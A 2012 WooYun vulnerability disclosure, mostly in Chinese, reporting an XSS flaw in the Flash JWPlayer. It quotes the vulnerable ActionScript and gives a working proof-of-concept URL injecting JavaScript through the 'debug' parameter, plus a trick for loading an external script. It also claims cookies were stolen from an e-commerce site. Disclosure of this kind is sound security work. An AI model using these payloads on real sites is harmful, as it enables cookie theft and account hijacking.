漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-07166
漏洞标题:JWPlayer Xss 0day [Flash编程安全问题]
相关厂商:LongTail Video
漏洞作者: gainover
提交时间:2012-05-15 23:35
修复时间:2012-05-15 23:35
公开时间:2012-05-15 23:35
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-05-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
国外的一款播放器,使用网站数量超过百万,官方介绍:“LongTail Video is a New York-based startup that has pioneered the web video market. Our flagship product the - JW Player - is active on over one million websites and streams billions of videos each month.”
该FLASH版本视频播放器代码编写上存在一处安全问题,利用之前我所用到的技巧,可以进行跨站攻击。
它自己主站跨站到无所谓啦,但是用到这个播放器的其它网站就难说了。
比如中国的“去哪儿” ,美国的某某某某站。。
详细说明:
A Xss vulnerability in JWPlayer
Test Browser: IE , Firefox.
Test Platform: Win 7.
1. The Bug code in
package com.longtailvideo.jwplayer.utils
class Logger
private static function send(_arg1:String):void
if (ExternalInterface.available){
ExternalInterface.call(_config.debug, text);<---directly use _config.debug
};
2. The _config.debug is directly used as the first parameter of ExternalInterface.call. And the _config is loaded from loaderInfo.parameters. Therefore, when we construct a link such as " jwplayer.swf?debug=(function(){alert('xxx')})() ", the passed-in javascript code will be run.
3. Then we can use the trick location.href='javascript:"<script src={js file url}></script>"' to load and run external javascript file.
Test encoded evil code:
4. That's all
漏洞证明:
1. Simple Alert
2. Stolen Cookies in a chinese e-commerce website.
修复方案:
Limit the length of "debug" parameters and check its content.
版权声明:转载请注明来源 gainover@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:5 (WooYun评价)